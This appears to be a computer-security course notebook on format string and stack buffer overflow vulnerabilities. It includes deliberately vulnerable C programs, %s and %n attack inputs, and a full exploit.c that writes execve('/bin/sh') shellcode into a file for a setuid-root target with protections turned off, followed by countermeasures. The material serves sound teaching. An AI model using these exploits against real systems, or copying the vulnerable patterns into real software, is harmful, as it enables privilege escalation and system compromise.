## <center> Format String Vulnerability </center>

### Format String

- The `printf` family of functions (`printf`, `fprintf`, `sprintf`, ...) prints a string according to a predefined format. 
- For `printf`, the first argument is called the *format string* (for `fprintf` and `sprintf` it follows the stream or buffer argument). 
  - Normal characters within this string are printed as is. 
  - Characters preceded by the special annotation `%` are conversion specifiers; each one formats the corresponding argument. 

In [1]:
%%writefile source/printf_example.c
#include <stdio.h>

int main() 
{
    int i=1, j=2, k=3;

    printf("Hello World \n");
    printf("Print 1 number:  %d\n", i);
    printf("Print 2 numbers: %d, %d\n", i, j);
    printf("Print 3 numbers: %d, %d, %d\n", i, j, k);
}

Writing source/printf_example.c


Run the following:

```
$ gcc -o printf_example Computer-Security/source/printf_example.c
$ ./printf_example
```

- `printf()` accepts a variable number of arguments. 
- Manual page: https://linux.die.net/man/3/printf
- How does it do this? Through the macros in `stdarg.h`, as the next example shows.

In [4]:
%%writefile source/variable_args.c
#include <stdio.h>
#include <stdarg.h>

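void myprint(int Narg, ... ) 
{
  int i;
  va_list ap;                              /* cursor over the optional arguments */

  va_start(ap, Narg);                      /* point ap just past Narg */
  for(i=0; i<Narg; i++) {
    printf("%d  ", va_arg(ap, int));       /* read the next argument as an int */
    printf("%f\n", va_arg(ap, double));    /* read the next argument as a double */
  }
  va_end(ap);                              /* release ap */
}

int main() {
  myprint(1, 2, 3.5);                      /* one (int, double) pair */
  myprint(2, 2, 3.5, 3, 4.5);              /* two (int, double) pairs */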
  return 1;
}

Overwriting source/variable_args.c


```
$ gcc -o variable_args Computer-Security/source/variable_args.c
$ ./variable_args
[11/23/18]seed@VM:~$ ./variable_args
2  3.500000
2  3.500000
3  4.500000
[11/23/18]seed@VM:~$
```

- `va_start()` initializes `ap` to point to the first optional argument, the one after `Narg`.
- `va_arg()` returns the value that `ap` currently points to, interpreted as the requested type, and advances `ap` to the next argument. 

Run the following:

```
$ gcc -g -o variable_args Computer-Security/source/variable_args.c
$ gdb variable_args
gdb-peda$ break 19
gdb-peda$ run
gdb-peda$ step
gdb-peda$ info args
gdb-peda$ x/dw &Narg
gdb-peda$ x/dw &Narg + 1
gdb-peda$ x/fg &Narg + 2
gdb-peda$ x/dw &Narg + 4
gdb-peda$ x/fg &Narg + 5
```

- `x`: print value at memory position
- `d`: integer, signed decimal
- `f`: floating point number
- `w`: word (four bytes)
- `g`: giant word (eight bytes)

<center> <img src="figure/format-string/1.png" width="400"/>

- `variable_args` hard-codes the type of each argument in `myprint`. 
- `printf` instead encodes the argument types in the format string using *format specifiers* (introduced by `%`). 
  - `printf` scans the format string and prints each character it encounters until it sees a format specifier. 
  - For each specifier, `printf` calls `va_arg()` with the type that the specifier implies; this returns the next optional argument and advances the pointer to the one after it. 

```
int id = 100, age = 25;
char *name = "Bob Smith";
printf("ID: %d, Name: %s, Age: %d\n", id, name, age);
```
<center> <img src="figure/format-string/2.png" width="400"/>

- `%d`: Treat the argument as an *int* number (use the decimal form). 
- `%x`: Treat the argument as an *unsigned int* (use the hexadecimal form). 
- `%s`: Treat the argument as a *string pointer*. 
- `%f`: Treat the argument as a *double* number. 

### Format String with Missing Optional Arguments

In [8]:
%%writefile source/missing_args.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  printf ("ID: %d, Name: %s, Age: %d\n", id, name);    /* age is deliberately missing */
  return 1;
}

Overwriting source/missing_args.c


In [7]:
%%writefile source/missing_args_v2.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  char *statement = "ID: %d, Name: %s, Age: %d\n"; 
  printf (statement, id, name);
  return 1;
}

Writing source/missing_args_v2.c


Compile and run the above examples. What is the difference?

<center> <img src="figure/format-string/3.png" width="400"/>

**Why is this dangerous?**

```
printf(user_input);
```

```
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
```

```
sprintf(format, "%s %s", getenv("PWD"), ": %d");
printf(format, program_data);
```

Bad things can happen when users can supply any part of the format string: every `%` specifier they add makes `printf` fetch an argument that the program never passed. 

### A Vulnerable Program

In [12]:
%%writefile source/vul_format_string.c
#include <stdio.h>

void fmtstr()
{
    char input[100];
    int var = 0x11223344;                     
    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets(input, sizeof(input)-1, stdin);

    printf(input); // The vulnerable place

    printf("Data at target address: 0x%x\n",var);
}

int main() { fmtstr(); return 0; }


Overwriting source/vul_format_string.c


<center> <img src="figure/format-string/4.png" width="500"/>

Run the following:

```
$ gcc -o vul Computer-Security/source/vul_format_string.c
$ sudo chown root vul
$ sudo chmod 4755 vul
$ sudo sysctl -w kernel.randomize_va_space=0
```

### Attack 1: Crash Program

- If we put several format specifiers in our input, we can get `printf()` to advance its `va_list` pointer to places beyond `printf()`'s stack frame. 
- `%s` treats each value it fetches as an address and reads a string from there. If that value is an invalid address (a null pointer, protected memory, a virtual address not mapped to physical memory, ...), the program will crash.
- Try running `vul` with `%s%s%s` as the input. 

### Attack 2: Print out Data on the Stack

- `%x` prints the integer value that the `va_list` pointer points to and advances the pointer by four bytes. 
- How can you view what is in the program's memory using `%x` ?

### Attack 3: Change Program's Data in Memory

- All `printf()`'s format specifiers print out data, except `%n`, which writes the number of characters printed out so far into memory. 

In [15]:
%%writefile source/print_args.c
#include <stdio.h>
int main()
{
  int   i = 0;
  printf ("Hello World%n\n", &i);    
  printf ("Character Count: %d\n", i);
  return 1;
}

Overwriting source/print_args.c


When `printf()` encounters `%n`, it does the following:

- get a value pointed to by the va_list pointer,
- treat this value as an address, and
- write to the memory at that address. 

To write to a chosen location with `printf()`, the address of that location must be on the stack, where `%n` will fetch it. 

How do we place the desired address onto the stack?

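- The `vul` program prints the address of the target variable. 
- Address randomization is disabled, so this address stays the same between runs. 
- The `input` buffer is itself on the stack, so an address placed at the start of our input ends up on the stack. We can generate the input with `echo` (or save it to a file) and *pipe* it into `vul`: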

```
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%n | ./vul
```

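- The number of `%x` specifiers must move the `va_list` pointer exactly to the address at the start of the input. With a different number, `%n` will most likely treat some other stack value as an address, and the program will crash with a segmentation fault.

- Replace `\x70\xea\xff\xbf` with the bytes of the value printed as **Target address**, in little-endian order (for example, **0xBFFFF304** becomes `\x04\xf3\xff\xbf`).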

<center> <img src="figure/format-string/5.png" width="500"/>

### Attack 4: Change Program's Data to a Specific Value

In [8]:
%%writefile source/strcpy_overflow.c
#include <string.h>

void foo(char *str)
{
    char buffer[12];

    /* The following statement will result in buffer overflow */ 
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";    
    foo(str);

    return 1;
}

Overwriting source/strcpy_overflow.c


Run the following:
```
$ gcc -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

Run the following:
```
$ gcc -z execstack -fno-stack-protector -o strcpy_overflow Computer-Security/source/strcpy_overflow.c
$ ./strcpy_overflow
```

<center> <img src="figure/format-string/6.png" width="700"/>

### Attack 5: Inject Malicious Code

<center> <img src="figure/format-string/7.png" width="400"/>

- The region above the buffer includes critical values, including the return address and the previous frame pointer. 
- The consequences of a modified return address (due to buffer overflow) include:
  - The new address (virtual address) might not be mapped to any physical address, leading to an invalid return instruction and a crashed program. 
  - The address might be mapped to a physical address in protected system space, leading to a failed jump and a crashed program. 
  - The address might be mapped to a physical address that does not contain any valid instruction, leading to a failed return and a crashed program. 
  - **The address might be mapped to a physical address that happens to contain valid machine instructions, leading to a continuing program with logic different from the original program.**

#### Exploiting a Buffer Overflow Vulnerability

- By overflowing a buffer, we can cause the program to crash or run something else. 
- If the program is privileged, this means *something else* will be run with privilege, leading to potential privilege escalation for *something malicious*. 

In [2]:
%%writefile source/stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];
    printf ("I am here");
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}


Overwriting source/stack.c


- Clearly, there is a buffer overflow issue.
- What needs to be stored in `badfile` to exploit this issue?

Disable countermeasures:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
Include the following flags with your gcc:
- `-z execstack`
- `-fno-stack-protector`

Run the following:
```
$ gcc -o stack -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
$ echo "aaaa" > badfile
$ ./stack
$ echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" > badfile
$ ./stack
```

How can we know (or guess) where the stack frame of `foo()` will be, so that we can locate the malicious code and set the jump address accordingly?
- The stack starts at a fixed address (when the address randomization countermeasure is disabled). 
- The stack is usually shallow (well-written programs rarely use deeply nested function calls). 

Disable address randomization, then run `mem_layout_print` several times. Do the addresses of the stack pointers change between runs?

How can we find the return address without guessing?

Run the following:
```
$ gcc -g -o stack_dbg -z execstack -fno-stack-protector Computer-Security/source/stack.c
$ rm badfile
$ touch badfile
$ gdb stack_dbg
gdb-peda$ break foo
gdb-peda$ run
gdb-peda$ print $ebp
gdb-peda$ print &buffer
gdb-peda$ print/x (unsigned)$ebp - (unsigned)&buffer
gdb-peda$ quit
```

- What is 0x6C in decimal?

The following program must be updated each time you retest: rerun the debugging steps above to find the current stack position, then adjust the address that the program writes.

In [23]:
%%writefile source/exploit.c
/* exploit.c  */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax     */
    "\x50"                 /* pushl   %eax          */
    "\x68""//sh"           /* pushl   $0x68732f2f   */
    "\x68""/bin"           /* pushl   $0x6e69622f   */
    "\x89\xe3"             /* movl    %esp,%ebx     */
    "\x50"                 /* pushl   %eax          */
    "\x53"                 /* pushl   %ebx          */
    "\x89\xe1"             /* movl    %esp,%ecx     */
    "\x99"                 /* cdq                   */
    "\xb0\x0b"             /* movb    $0x0b,%al     */
    "\xcd\x80"             /* int     $0x80         */
;

void main(int argc, char **argv)
{
  char buffer[200];
  FILE *badfile;

  /* A. Initialize buffer with 0x90 (NOP instruction) */
  memset(&buffer, 0x90, 200);

  /* B. Fill the return address field with a candidate
        entry point of the malicious code. This needs to be changed
        every time you rerun the vulnerable program. If the attack
        does not work, change 0x16 to a different value and try again. */
  *((long *) (buffer + 112)) = 0xbfffe968 + 0x16;

  // C. Place the shellcode towards the end of buffer
  memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));

  /* Save the contents to the file "badfile" */
  badfile = fopen("./badfile", "w");
  fwrite(buffer, 200, 1, badfile);
  fclose(badfile);
}

Overwriting source/exploit.c


### How serious is this vulnerability?

- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=format+string+
- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-format-string-vulnerability-in-ibm-db2-tool-db2support-cve-2018-1566/

### Countermeasures

#### General approaches

- Safer functions: specification of maximum data length to be copied
- Safer dynamic link library: dynamic link to safer libraries (as opposed to calling unsafe functions)
- Program static analyzer: warn of code patterns that could lead to buffer overflow
- Programming language: self-check against buffer overflow in the language
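- Compiler: stack protection that detects overwritten return addresses (turned off in the examples above with `-fno-stack-protector`)
- Operating system: address space layout randomization (turned off in the examples above with `kernel.randomize_va_space=0`)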